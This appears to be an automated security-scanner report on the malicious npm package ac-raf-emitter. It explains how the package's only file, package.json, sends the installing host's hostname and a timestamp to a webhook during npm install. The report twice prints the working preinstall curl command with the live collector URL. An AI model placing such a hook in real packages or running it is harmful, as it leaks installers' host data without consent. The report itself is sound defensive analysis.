AI Security Review
scanned 3h ago · by lpm-firewall-aiInstalling the package automatically sends host-identifying metadata to a third-party webhook. No source files besides the manifest are present.
Static reason
One or more suspicious static signals were detected.
Trigger
npm install, before package installation completes
Impact
Unconsented disclosure of installation-host metadata to a third party.
Mechanism
preinstall curl POST exfiltrates hostname and timestamp
Attack narrative
`package.json` executes a `preinstall` command automatically when npm installs this package. The command POSTs to a third-party webhook URL and includes `$(hostname)` plus the current timestamp as a query parameter, creating unconsented install-host telemetry. The manifest is the only package file and its declared runtime entrypoint does not exist, so the package provides no apparent legitimate implementation that would justify the lifecycle network call.
Rationale
Direct inspection confirms concrete install-time network exfiltration of host metadata, with no package source implementation present. This is malicious supply-chain behavior.
Evidence
package.json
Network endpoints1
webhook.site/54919426-084d-4288-8f80-e36ae5c76e32
OSV Corroboration
OpenSSF/OSVAdvisory
MAL-2026-10675
Source
OpenSSF Malicious Packages via OSV
Summary
Malicious code in ac-raf-emitter (npm)
Details
package.json declares a preinstall lifecycle script that runs `curl -X POST` against a hardcoded webhook.site collector URL (https://webhook.site/54919426-084d-4288-8f80-e36ae5c76e32), passing the installer's hostname and a timestamp as query parameters. The exfiltration fires automatically on `npm install` before any consumer code runs. The destination is an anonymous, author-controlled request-inspection endpoint with no legitimate role in the package's advertised functionality.
References
Decision evidence
public snapshotAI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
- `package.json` defines a `preinstall` lifecycle hook.
- The hook runs `curl -X POST` to `webhook.site` during installation.
- It embeds the installing host's hostname and a timestamp in the request URL.
- The package description explicitly says “Softwaer supply chain attack vector”.
- Declared `index.js` entrypoint is absent; package contains only `package.json`.
Evidence against
Behavioral surface
NoLicense
Source & flagged code
2 flagged · loading sourcepackage.jsonView file
•scripts.preinstall = curl -X POST "https://webhook.site/54919426-084d-4288-8f80-e36ae5c76e32?id=$(hostname)-$(date +%s)"
High
Install Time Lifecycle Scripts
Package defines install-time lifecycle scripts.
package.jsonView on unpkg•scripts.preinstall = curl -X POST "https://webhook.site/54919426-084d-4288-8f80-e36ae5c76e32?id=$(hostname)-$(date +%s)"
Medium
Ambiguous Install Lifecycle Script
Install-time lifecycle script is not statically allowlisted and needs review.
package.jsonView on unpkgFindings
1 High1 Medium2 Low
HighInstall Time Lifecycle Scriptspackage.json
MediumAmbiguous Install Lifecycle Scriptpackage.json
LowScripts Present
LowNo License